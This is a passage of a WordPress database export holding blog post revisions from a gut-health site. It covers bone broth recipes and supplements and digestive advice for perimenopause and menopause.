\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-09-12 09:35:29','2023-09-12 09:35:29','',5473,'https://tummyrevolution.com/?p=5477',0,'revision','',0),(5482,1,'2023-09-12 09:45:12','2023-09-12 09:45:12','','kadir-celep-qFpTSS7BSuM-unsplash','','inherit','open','closed','','kadir-celep-qfptss7bsum-unsplash-3','','','2023-09-12 09:45:12','2023-09-12 09:45:12','',5472,'http://tummyrevolution.com/wp-content/uploads/2023/09/kadir-celep-qFpTSS7BSuM-unsplash-2.jpg',0,'attachment','image/jpeg',0),(5483,1,'2023-09-12 09:46:15','2023-09-12 09:46:15','\n

Bone broth, a time-honored culinary tradition, has resurfaced as a nutritional powerhouse that promotes gut health and overall well-being. Creating your own homemade bone broth is a rewarding and surprisingly simple process that allows you to harness the myriad benefits of this nutrient-rich elixir. In this guide, we\'ll walk you through the art of making both chicken and beef bone broths, offering you a warm, nourishing cup of wellness.

\n\n\n\n
\"Bone
\n\n\n\n

Chicken Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 1 whole organic chicken or chicken bones (from leftover roasted chicken)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or parsley
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Place the chicken or chicken bones in a large pot and cover with water. Add a splash of vinegar (apple cider vinegar works well) to help extract minerals from the bones.
  2. \n\n\n\n
  3. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  4. \n\n\n\n
  5. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 6-8 hours, up to 24 hours. The longer you simmer, the richer the flavor and nutrients will be.
  6. \n\n\n\n
  7. Skim off any foam that rises to the surface during the initial stages of simmering.
  8. \n\n\n\n
  9. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  10. \n\n\n\n
  11. Season the broth with salt and pepper to taste. You can also add a pinch of turmeric or ginger for added flavor and anti-inflammatory benefits.
  12. \n
\n\n\n\n

Beef Bone Broth:

\n\n\n\n

Ingredients:

\n\n\n\n
    \n
  • 2-3 pounds of beef bones (marrow bones, knuckle bones, etc.)
  • \n\n\n\n
  • 2-3 carrots, washed and chopped
  • \n\n\n\n
  • 2-3 celery stalks, washed and chopped
  • \n\n\n\n
  • 1 onion, peeled and halved
  • \n\n\n\n
  • 4-6 cloves of garlic, smashed
  • \n\n\n\n
  • Fresh herbs like thyme, rosemary, or bay leaves
  • \n\n\n\n
  • Water
  • \n\n\n\n
  • Salt and pepper to taste
  • \n
\n\n\n\n

Instructions:

\n\n\n\n
    \n
  1. Roast the beef bones in the oven at 400°F (200°C) for about 30 minutes until they are browned and caramelized. This step enhances the flavor of the broth.
  2. \n\n\n\n
  3. Transfer the roasted bones to a large pot and cover with water. Add a splash of vinegar to help extract minerals.
  4. \n\n\n\n
  5. Add the chopped vegetables, onion, garlic, and herbs to the pot.
  6. \n\n\n\n
  7. Bring the water to a gentle boil, then reduce the heat to low. Allow the broth to simmer for at least 12-24 hours, or even longer.
  8. \n\n\n\n
  9. Skim off any foam that rises to the surface during the initial stages of simmering.
  10. \n\n\n\n
  11. After simmering, strain the broth through a fine-mesh sieve or cheesecloth to remove bones and solids.
  12. \n\n\n\n
  13. Season the broth with salt and pepper to taste. You can also add a dash of soy sauce or Worcestershire sauce for depth of flavor.
  14. \n\n\n\n
  15. \n
\n\n\n\n

Making your own chicken and beef bone broths is a fulfilling culinary endeavor that rewards you with a nourishing elixir that supports gut health and overall wellness. With just a few simple ingredients and a bit of patience, you can craft these flavorful broths that can be sipped on their own or used as a base for a variety of soups, stews, and dishes. Remember, the heart of bone broth lies in its slow simmering process, which extracts the nutrients and rich flavors that make it a beloved tonic for generations.

\n','A Step-by-Step Guide to Crafting Nourishing Chicken and Beef Bone Broths','','inherit','closed','closed','','5472-revision-v1','','','2023-09-12 09:46:15','2023-09-12 09:46:15','',5472,'https://tummyrevolution.com/?p=5483',0,'revision','',0),(5479,1,'2023-09-12 09:37:10','2023-09-12 09:37:10','','kadir-celep-qFpTSS7BSuM-unsplash','','inherit','open','closed','','kadir-celep-qfptss7bsum-unsplash-2','','','2023-09-12 09:37:10','2023-09-12 09:37:10','',5472,'http://tummyrevolution.com/wp-content/uploads/2023/09/kadir-celep-qFpTSS7BSuM-unsplash-1.jpg',0,'attachment','image/jpeg',0),(5499,3,'2023-09-12 14:12:33','2023-09-12 14:12:33','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being. In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh

\n\n\n\n

Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

2.Soy Isoflavones

\n\n\n\n

Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

3.Evening Primrose Oil

\n\n\n\n

Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

4. Vitamin D

\n\n\n\n

Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

5.Calcium and Magnesium

\n\n\n\n

As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

6.B Vitamins

\n\n\n\n

B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

7.Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

8.Probiotics

\n\n\n\n

Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-09-12 14:12:33','2023-09-12 14:12:33','',5473,'https://tummyrevolution.com/?p=5499',0,'revision','',0),(5481,3,'2023-09-12 09:40:52','2023-09-12 09:40:52','\n

Perimenopause is a natural phase in a woman\'s life that typically occurs in her 40s or early 50s, leading up to menopause. During this transitional period, hormonal fluctuations can cause a variety of physical and emotional symptoms, such as hot flashes, mood swings, and sleep disturbances. While these changes are a normal part of aging, they can sometimes be challenging to navigate. Thankfully, there are various perimenopause supplements for women that can help alleviate these symptoms and promote overall well-being. In this comprehensive guide, we\'ll explore some of the best perimenopause supplements to consider.

\n\n\n\n

1.Black Cohosh

\n\n\n\n

\n\n\n\n

Black cohosh is a popular herbal remedy for managing perimenopausal symptoms. It is believed to help regulate hormone levels, particularly estrogen, which can decline during perimenopause. Studies have shown that black cohosh may be effective in reducing hot flashes, night sweats, and mood swings. It is available in various forms, including capsules, tablets, and tinctures.

\n\n\n\n

2.Soy Isoflavones

\n\n\n\n

\n\n\n\n

Soy isoflavones are natural compounds found in soybeans and soy products. These compounds have a chemical structure similar to estrogen, making them known as phytoestrogens. Phytoestrogens can help balance hormone levels in the body, potentially reducing the severity of hot flashes and other menopausal symptoms. Women who include soy-based foods or supplements in their diet may experience relief from perimenopausal symptoms.

\n\n\n\n

3.Evening Primrose Oil

\n\n\n\n

Evening primrose oil is derived from the seeds of the evening primrose plant and is rich in gamma-linolenic acid (GLA). GLA is an essential fatty acid that can help regulate hormone production and reduce inflammation. Many women find that taking evening primrose oil supplements can improve skin health, alleviate breast tenderness, and reduce mood swings.

\n\n\n\n

4. Vitamin D

\n\n\n\n

Vitamin D is essential for overall health, and it plays a crucial role in bone health and immune function. During perimenopause and menopause, the risk of osteoporosis increases due to declining estrogen levels. Supplementing with vitamin D can help maintain strong bones and reduce the risk of fractures. Additionally, vitamin D may also contribute to better mood and cognitive function.

\n\n\n\n

5.Calcium and Magnesium

\n\n\n\n

As estrogen levels decrease during perimenopause, the body\'s ability to absorb calcium from food diminishes. This can lead to a higher risk of bone loss and osteoporosis. Calcium and magnesium supplements can help maintain bone density and reduce the risk of fractures. These minerals are also beneficial for muscle function and may help with sleep disturbances and muscle cramps.

\n\n\n\n

6.B Vitamins

\n\n\n\n

B vitamins, including B6 and B12, are essential for maintaining energy levels and supporting overall well-being. They play a role in regulating mood and reducing stress and anxiety, which are common perimenopausal symptoms. B vitamin supplements can help combat fatigue and enhance mental clarity during this transitional phase.

\n\n\n\n

7.Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fish oil supplements, are known for their anti-inflammatory properties. They can help alleviate joint pain, reduce mood swings, and support cardiovascular health. Omega-3 supplements may also contribute to healthier skin and hair.

\n\n\n\n

8.Probiotics

\n\n\n\n

Gut health is closely linked to overall well-being, and during perimenopause, hormonal fluctuations can sometimes disrupt the gut microbiome. Probiotic supplements can help restore and maintain a healthy balance of gut bacteria, potentially reducing bloating, digestive issues, and immune system challenges.

\n\n\n\n

Conclusion

\n\n\n\n

Perimenopause is a natural phase in a woman\'s life, but it doesn\'t have to be a time of discomfort and distress. These perimenopause supplements for women can provide relief from a wide range of symptoms, allowing you to navigate this transitional phase with greater ease and confidence. However, it\'s important to consult with a healthcare provider before adding any new supplements to your routine, as individual needs and responses may vary. In combination with a healthy lifestyle, these supplements can contribute to a smoother perimenopausal journey, helping you embrace the changes that come with this transformative phase of life.

\n\n\n\n

\n\n\n\n

\n\n\n\n

\n','Perimenopause Supplements for Women: A Comprehensive Guide','','inherit','closed','closed','','5473-revision-v1','','','2023-09-12 09:40:52','2023-09-12 09:40:52','',5473,'https://tummyrevolution.com/?p=5481',0,'revision','',0),(5485,1,'2023-09-12 09:52:26','2023-09-12 09:52:26','','broth','','inherit','open','closed','','broth','','','2023-09-12 09:52:26','2023-09-12 09:52:26','',5472,'http://tummyrevolution.com/wp-content/uploads/2023/09/broth.jpg',0,'attachment','image/jpeg',0),(5486,3,'2023-09-12 13:48:23','2023-09-12 13:48:23','\n

Menopause is a natural and inevitable phase in a woman\'s life, marking the end of her reproductive years. While it brings relief from monthly periods and pregnancy worries, it also ushers in a host of physical and hormonal changes. One common issue that many women face during menopause is urinary problems. These can range from increased frequency and urgency to urinary incontinence. Fortunately, there are supplements available that can help manage these issues and improve your overall quality of life during this stage.

\n\n\n\n

This post contains affiliate links. This means I may earn a commission should you choose to make a purchase using my link.

\n\n\n\n

In this blog, we will explore some of the supplements that can be beneficial for managing urinary problems during menopause.

\n\n\n\n

Cranberry Extract

\n\n\n\n

Cranberry extract has long been known for its potential to support urinary tract health. It contains compounds like proanthocyanidins, which may help prevent urinary tract infections (UTIs) and reduce the risk of recurrent infections. During menopause, women may be more susceptible to UTIs due to hormonal changes, so incorporating cranberry extract into your routine can be a wise choice. You can find cranberry supplements in various forms, including capsules and juice extracts.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

D-Mannose

\n\n\n\n

D-mannose is a natural sugar that has gained popularity for its ability to prevent and treat UTIs. It works by preventing bacteria, particularly E. coli, from adhering to the urinary tract lining, allowing your body to flush them out more easily. While D-mannose supplements are not a cure for urinary problems, they can be a helpful addition to your menopause management strategy.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Probiotics

\n\n\n\n

Probiotics are beneficial bacteria that promote a healthy gut microbiome, and they may also play a role in supporting urinary health. Some research suggests that certain probiotic strains can help reduce the risk of UTIs and improve overall urinary function. As hormonal changes during menopause can disrupt the balance of bacteria in your body, probiotics may help restore equilibrium.

\n\n\n\n

Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Pumpkin Seed Extract

\n\n\n\n

Pumpkin seed extract is rich in antioxidants, vitamins, and minerals that can benefit your urinary system. It has been studied for its potential to alleviate symptoms of an overactive bladder and improve bladder function. Some women find relief from urinary urgency and frequency by incorporating pumpkin seed extract into their daily regimen.

\n\n\n\n

The Link to the Recommended Product

\n\n\n\n\"\"\n\n\n\n

Conclusion

\n\n\n\n

Menopause is a significant life transition for women, and it often comes with various challenges, including urinary issues. While supplements can be a helpful part of your strategy for managing these problems, it\'s crucial to remember that they are not a substitute for a healthy lifestyle, including a balanced diet, regular exercise, and good hydration habits.

\n\n\n\n

Before adding any new supplement to your routine, it\'s essential to consult with a healthcare professional. They can help you determine the right supplements for your specific needs and ensure that they won\'t interact negatively with any medications you may be taking. With the right approach and guidance, you can effectively manage urinary issues during menopause and maintain your overall well-being.

\n','Supplements for Managing Urinary Issues During Menopause','','publish','open','open','','supplements-for-managing-urinary-issues-during-menopause','','','2023-10-10 08:55:24','2023-10-10 08:55:24','',0,'https://tummyrevolution.com/?p=5486',0,'post','',0),(5487,3,'2023-09-12 13:46:48','2023-09-12 13:46:48','','rasa-kasparaviciene-0TFxOkhFt14-unsplash','','inherit','open','closed','','rasa-kasparaviciene-0tfxokhft14-unsplash','','','2023-09-12 13:46:48','2023-09-12 13:46:48','',5486,'http://tummyrevolution.com/wp-content/uploads/2023/09/rasa-kasparaviciene-0TFxOkhFt14-unsplash.jpg',0,'attachment','image/jpeg',0),(5488,3,'2023-09-12 13:48:23','2023-09-12 13:48:23','\n

Menopause is a natural and inevitable phase in a woman\'s life, marking the end of her reproductive years. While it brings relief from monthly periods and pregnancy worries, it also ushers in a host of physical and hormonal changes. One common issue that many women face during menopause is urinary problems. These can range from increased frequency and urgency to urinary incontinence. Fortunately, there are supplements available that can help manage these issues and improve your overall quality of life during this stage. In this blog, we will explore some of the supplements that can be beneficial for managing urinary problems during menopause.

\n\n\n\n

Cranberry Extract

\n\n\n\n

Cranberry extract has long been known for its potential to support urinary tract health. It contains compounds like proanthocyanidins, which may help prevent urinary tract infections (UTIs) and reduce the risk of recurrent infections. During menopause, women may be more susceptible to UTIs due to hormonal changes, so incorporating cranberry extract into your routine can be a wise choice. You can find cranberry supplements in various forms, including capsules and juice extracts.

\n\n\n\n

D-Mannose

\n\n\n\n

D-mannose is a natural sugar that has gained popularity for its ability to prevent and treat UTIs. It works by preventing bacteria, particularly E. coli, from adhering to the urinary tract lining, allowing your body to flush them out more easily. While D-mannose supplements are not a cure for urinary problems, they can be a helpful addition to your menopause management strategy.

\n\n\n\n

Probiotics

\n\n\n\n

Probiotics are beneficial bacteria that promote a healthy gut microbiome, and they may also play a role in supporting urinary health. Some research suggests that certain probiotic strains can help reduce the risk of UTIs and improve overall urinary function. As hormonal changes during menopause can disrupt the balance of bacteria in your body, probiotics may help restore equilibrium.

\n\n\n\n

Pumpkin Seed Extract

\n\n\n\n

Pumpkin seed extract is rich in antioxidants, vitamins, and minerals that can benefit your urinary system. It has been studied for its potential to alleviate symptoms of an overactive bladder and improve bladder function. Some women find relief from urinary urgency and frequency by incorporating pumpkin seed extract into their daily regimen.

\n\n\n\n

Soy Isoflavones

\n\n\n\n

Soy isoflavones are compounds found in soybeans that mimic the effects of estrogen in the body. During menopause, when estrogen levels drop, some women experience urinary problems due to changes in the bladder and urethra. Soy isoflavone supplements may help alleviate these symptoms by providing a mild estrogen-like effect. However, it\'s essential to consult with a healthcare professional before starting any new supplement, especially if you have a history of estrogen-sensitive conditions.

\n\n\n\n

Omega-3 Fatty Acids

\n\n\n\n

Omega-3 fatty acids, found in fish oil supplements, have anti-inflammatory properties that can benefit overall health, including urinary health. Inflammation can contribute to urinary problems, so incorporating omega-3 supplements into your diet may help reduce inflammation and improve bladder function.

\n\n\n\n

Conclusion

\n\n\n\n

Menopause is a significant life transition for women, and it often comes with various challenges, including urinary issues. While supplements can be a helpful part of your strategy for managing these problems, it\'s crucial to remember that they are not a substitute for a healthy lifestyle, including a balanced diet, regular exercise, and good hydration habits.

\n\n\n\n

Before adding any new supplement to your routine, it\'s essential to consult with a healthcare professional. They can help you determine the right supplements for your specific needs and ensure that they won\'t interact negatively with any medications you may be taking. With the right approach and guidance, you can effectively manage urinary issues during menopause and maintain your overall well-being.

\n','Supplements for Managing Urinary Issues during Menopause','','inherit','closed','closed','','5486-revision-v1','','','2023-09-12 13:48:23','2023-09-12 13:48:23','',5486,'https://tummyrevolution.com/?p=5488',0,'revision','',0),(5489,3,'2023-09-12 14:02:31','2023-09-12 14:02:31','\n

Menopause is a natural phase in a woman\'s life, marking the end of her reproductive years. While it brings about a multitude of physical and hormonal changes, many women may not be aware that these changes can also impact their digestive system. Digestive problems during menopause are not uncommon, but understanding the causes and seeking appropriate treatment can help alleviate discomfort and improve overall well-being.

\n\n\n\n

The Menopausal Digestive Connection

\n\n\n\n

As women approach menopause, hormonal fluctuations, particularly a decline in estrogen and progesterone levels, can influence various bodily functions, including digestion. These hormonal changes can affect the functioning of the gastrointestinal tract, leading to a range of digestive issues. Common digestive problems during menopause include:

\n\n\n\n
    \n
  1. Gastroesophageal Reflux Disease (GERD): The decrease in estrogen levels can lead to a weakening of the muscles that control the opening between the esophagus and stomach, resulting in acid reflux and heartburn.
  2. \n\n\n\n
  3. Bloating and Gas: Hormonal changes can slow down digestion, causing food to linger in the digestive tract longer than usual. This can lead to increased gas production and bloating.
  4. \n\n\n\n
  5. Constipation: Reduced estrogen levels can impact bowel movements by affecting muscle contractions in the intestines. This can result in constipation and discomfort.
  6. \n\n\n\n
  7. Irritable Bowel Syndrome (IBS): Menopause can exacerbate symptoms of IBS, including abdominal pain, diarrhea, and constipation, due to the hormonal changes\' impact on gut sensitivity.
  8. \n\n\n\n
  9. Changes in Appetite: Fluctuating hormones can lead to changes in appetite, potentially causing overeating or loss of interest in food.
  10. \n
\n\n\n\n

Managing Digestive Problems

\n\n\n\n

The good news is that there are several effective strategies for managing digestive problems during menopause. It\'s important to consult a healthcare professional before making any significant changes, as individual needs may vary. Here are some approaches to consider:

\n\n\n\n

Dietary Modifications:

\n\n\n\n
    \n
  1. Increase fiber intake: A high-fiber diet can help alleviate constipation and promote regular bowel movements.
  2. \n\n\n\n
  3. Avoid trigger foods: Spicy, acidic, and fatty foods can worsen acid reflux and heartburn. Limiting these foods can provide relief.
  4. \n\n\n\n
  5. Stay hydrated: Drinking plenty of water supports healthy digestion and prevents constipation.
  6. \n\n\n\n
  7. Probiotics: Incorporating probiotic-rich foods or supplements can help maintain gut health and ease symptoms of bloating and gas.
  8. \n\n\n\n
  9. Lifestyle Changes:
  10. \n\n\n\n
  11. Maintain a healthy weight: Excess weight can contribute to digestive issues. Regular exercise and a balanced diet can aid in weight management.
  12. \n\n\n\n
  13. Eat smaller, frequent meals: Opting for smaller meals throughout the day can help prevent overloading the digestive system.
  14. \n\n\n\n
  15. Stress management: Practicing relaxation techniques such as yoga, meditation, or deep breathing can alleviate stress-related digestive problems.
  16. \n
\n\n\n\n

Medications and Supplements:

\n\n\n\n
    \n
  • Antacids: Over-the-counter antacids can provide temporary relief from heartburn and acid reflux symptoms.
  • \n\n\n\n
  • Laxatives: For occasional constipation, gentle laxatives may be recommended, but they should be used under medical supervision.
  • \n\n\n\n
  • Hormone therapy: In some cases, hormone replacement therapy (HRT) may be prescribed to manage menopausal symptoms, which could indirectly improve digestive issues.
  • \n\n\n\n
  • Regular Medical Check-ups:
  • \n\n\n\n
  •  Regular visits to a healthcare provider are essential to monitor and manage any emerging health concerns.
  • \n
\n\n\n\n

LINK TO THE BEST SUPPLEMENTS FOR GOOD GUT HEALTH DURING & AFTER MENOPAUSE

\n\n\n\n

Conclusion

\n\n\n\n

While digestive problems during menopause can be challenging, they are manageable with the right approach. By making dietary adjustments, adopting a healthy lifestyle, considering medications if necessary, and seeking guidance from healthcare professionals, women can navigate this transitional phase with greater comfort and improved digestive well-being. Remember, each woman\'s experience is unique, so it\'s important to tailor strategies to individual needs and preferences for the best results.

\n','A Comprehensive Guide to Digestive Problems During Menopause','','publish','open','open','','a-comprehensive-guide-to-digestive-problems-during-menopause','','','2023-10-10 14:18:46','2023-10-10 14:18:46','',0,'https://tummyrevolution.com/?p=5489',0,'post','',0),(5490,3,'2023-09-12 14:01:00','2023-09-12 14:01:00','','emmanuel-olguin-WgyUYag2H5g-unsplash','','inherit','open','closed','','emmanuel-olguin-wgyuyag2h5g-unsplash','','','2023-09-12 14:01:00','2023-09-12 14:01:00','',5489,'http://tummyrevolution.com/wp-content/uploads/2023/09/emmanuel-olguin-WgyUYag2H5g-unsplash.jpg',0,'attachment','image/jpeg',0),(5491,3,'2023-09-12 14:02:31','2023-09-12 14:02:31','\n

Menopause is a natural phase in a woman\'s life, marking the end of her reproductive years. While it brings about a multitude of physical and hormonal changes, many women may not be aware that these changes can also impact their digestive system. Digestive problems during menopause are not uncommon, but understanding the causes and seeking appropriate treatment can help alleviate discomfort and improve overall well-being.

\n\n\n\n

The Menopausal Digestive Connection

\n\n\n\n

As women approach menopause, hormonal fluctuations, particularly a decline in estrogen and progesterone levels, can influence various bodily functions, including digestion. These hormonal changes can affect the functioning of the gastrointestinal tract, leading to a range of digestive issues. Common digestive problems during menopause include:

\n\n\n\n
    \n
  1. Gastroesophageal Reflux Disease (GERD): The decrease in estrogen levels can lead to a weakening of the muscles that control the opening between the esophagus and stomach, resulting in acid reflux and heartburn.
  2. \n\n\n\n
  3. Bloating and Gas: Hormonal changes can slow down digestion, causing food to linger in the digestive tract longer than usual. This can lead to increased gas production and bloating.
  4. \n\n\n\n
  5. Constipation: Reduced estrogen levels can impact bowel movements by affecting muscle contractions in the intestines. This can result in constipation and discomfort.
  6. \n
\n\n\n\n
    \n
  • Irritable Bowel Syndrome (IBS): Menopause can exacerbate symptoms of IBS, including abdominal pain, diarrhea, and constipation, due to the hormonal changes\' impact on gut sensitivity.
  • \n\n\n\n
  • Changes in Appetite: Fluctuating hormones can lead to changes in appetite, potentially causing overeating or loss of interest in food.
  • \n
\n\n\n\n

Managing Digestive Problems

\n\n\n\n

The good news is that there are several effective strategies for managing digestive problems during menopause. It\'s important to consult a healthcare professional before making any significant changes, as individual needs may vary. Here are some approaches to consider:

\n\n\n\n
    \n
  1. Dietary Modifications:
  2. \n\n\n\n
  3. Increase fiber intake: A high-fiber diet can help alleviate constipation and promote regular bowel movements.
  4. \n\n\n\n
  5. Avoid trigger foods: Spicy, acidic, and fatty foods can worsen acid reflux and heartburn. Limiting these foods can provide relief.
  6. \n\n\n\n
  7. Stay hydrated: Drinking plenty of water supports healthy digestion and prevents constipation.
  8. \n\n\n\n
  9. Probiotics: Incorporating probiotic-rich foods or supplements can help maintain gut health and ease symptoms of bloating and gas.
  10. \n\n\n\n
  11. Lifestyle Changes:
  12. \n\n\n\n
  13. Maintain a healthy weight: Excess weight can contribute to digestive issues. Regular exercise and a balanced diet can aid in weight management.
  14. \n\n\n\n
  15. Eat smaller, frequent meals: Opting for smaller meals throughout the day can help prevent overloading the digestive system.
  16. \n\n\n\n
  17. Stress management: Practicing relaxation techniques such as yoga, meditation, or deep breathing can alleviate stress-related digestive problems.
  18. \n
\n\n\n\n
    \n
  • Medications and Supplements:
  • \n\n\n\n
  • Antacids: Over-the-counter antacids can provide temporary relief from heartburn and acid reflux symptoms.
  • \n\n\n\n
  • Laxatives: For occasional constipation, gentle laxatives may be recommended, but they should be used under medical supervision.
  • \n\n\n\n
  • Hormone therapy: In some cases, hormone replacement therapy (HRT) may be prescribed to manage menopausal symptoms, which could indirectly improve digestive issues.
  • \n\n\n\n
  • Regular Medical Check-ups:
  • \n\n\n\n
  •  Regular visits to a healthcare provider are essential to monitor and manage any emerging health concerns.
  • \n
\n\n\n\n

LINK TO SUPPLIMENTS

\n\n\n\n

Conclusion

\n\n\n\n

While digestive problems during menopause can be challenging, they are manageable with the right approach. By making dietary adjustments, adopting a healthy lifestyle, considering medications if necessary, and seeking guidance from healthcare professionals, women can navigate this transitional phase with greater comfort and improved digestive well-being. Remember, each woman\'s experience is unique, so it\'s important to tailor strategies to individual needs and preferences for the best results.

\n','A Comprehensive Guide to Digestive Problems During Menopause','','inherit','closed','closed','','5489-revision-v1','','','2023-09-12 14:02:31','2023-09-12 14:02:31','',5489,'https://tummyrevolution.com/?p=5491',0,'revision','',0),(5494,3,'2023-09-12 14:07:57','2023-09-12 14:07:57','\n

Menopause is a natural phase in a woman\'s life, marking the end of her reproductive years. While it brings about a multitude of physical and hormonal changes, many women may not be aware that these changes can also impact their digestive system. Digestive problems during menopause are not uncommon, but understanding the causes and seeking appropriate treatment can help alleviate discomfort and improve overall well-being.

\n\n\n\n

The Menopausal Digestive Connection

\n\n\n\n

As women approach menopause, hormonal fluctuations, particularly a decline in estrogen and progesterone levels, can influence various bodily functions, including digestion. These hormonal changes can affect the functioning of the gastrointestinal tract, leading to a range of digestive issues. Common digestive problems during menopause include:

\n\n\n\n
    \n
  1. Gastroesophageal Reflux Disease (GERD): The decrease in estrogen levels can lead to a weakening of the muscles that control the opening between the esophagus and stomach, resulting in acid reflux and heartburn.
  2. \n\n\n\n
  3. Bloating and Gas: Hormonal changes can slow down digestion, causing food to linger in the digestive tract longer than usual. This can lead to increased gas production and bloating.
  4. \n\n\n\n
  5. Constipation: Reduced estrogen levels can impact bowel movements by affecting muscle contractions in the intestines. This can result in constipation and discomfort.
  6. \n\n\n\n
  7. Irritable Bowel Syndrome (IBS): Menopause can exacerbate symptoms of IBS, including abdominal pain, diarrhea, and constipation, due to the hormonal changes\' impact on gut sensitivity.
  8. \n\n\n\n
  9. Changes in Appetite: Fluctuating hormones can lead to changes in appetite, potentially causing overeating or loss of interest in food.
  10. \n
\n\n\n\n

Managing Digestive Problems

\n\n\n\n

The good news is that there are several effective strategies for managing digestive problems during menopause. It\'s important to consult a healthcare professional before making any significant changes, as individual needs may vary. Here are some approaches to consider:

\n\n\n\n

Dietary Modifications:

\n\n\n\n
    \n
  1. Increase fiber intake: A high-fiber diet can help alleviate constipation and promote regular bowel movements.
  2. \n\n\n\n
  3. Avoid trigger foods: Spicy, acidic, and fatty foods can worsen acid reflux and heartburn. Limiting these foods can provide relief.
  4. \n\n\n\n
  5. Stay hydrated: Drinking plenty of water supports healthy digestion and prevents constipation.
  6. \n\n\n\n
  7. Probiotics: Incorporating probiotic-rich foods or supplements can help maintain gut health and ease symptoms of bloating and gas.
  8. \n\n\n\n
  9. Lifestyle Changes:
  10. \n\n\n\n
  11. Maintain a healthy weight: Excess weight can contribute to digestive issues. Regular exercise and a balanced diet can aid in weight management.
  12. \n\n\n\n
  13. Eat smaller, frequent meals: Opting for smaller meals throughout the day can help prevent overloading the digestive system.
  14. \n\n\n\n
  15. Stress management: Practicing relaxation techniques such as yoga, meditation, or deep breathing can alleviate stress-related digestive problems.
  16. \n
\n\n\n\n

Medications and Supplements:

\n\n\n\n
    \n
  • Antacids: Over-the-counter antacids can provide temporary relief from heartburn and acid reflux symptoms.
  • \n\n\n\n
  • Laxatives: For occasional constipation, gentle laxatives may be recommended, but they should be used under medical supervision.
  • \n\n\n\n
  • Hormone therapy: In some cases, hormone replacement therapy (HRT) may be prescribed to manage menopausal symptoms, which could indirectly improve digestive issues.
  • \n\n\n\n
  • Regular Medical Check-ups:
  • \n\n\n\n
  •  Regular visits to a healthcare provider are essential to monitor and manage any emerging health concerns.
  • \n
\n\n\n\n

LINK TO SUPPLIMENTS

\n\n\n\n

Conclusion

\n\n\n\n

While digestive problems during menopause can be challenging, they are manageable with the right approach. By making dietary adjustments, adopting a healthy lifestyle, considering medications if necessary, and seeking guidance from healthcare professionals, women can navigate this transitional phase with greater comfort and improved digestive well-being. Remember, each woman\'s experience is unique, so it\'s important to tailor strategies to individual needs and preferences for the best results.

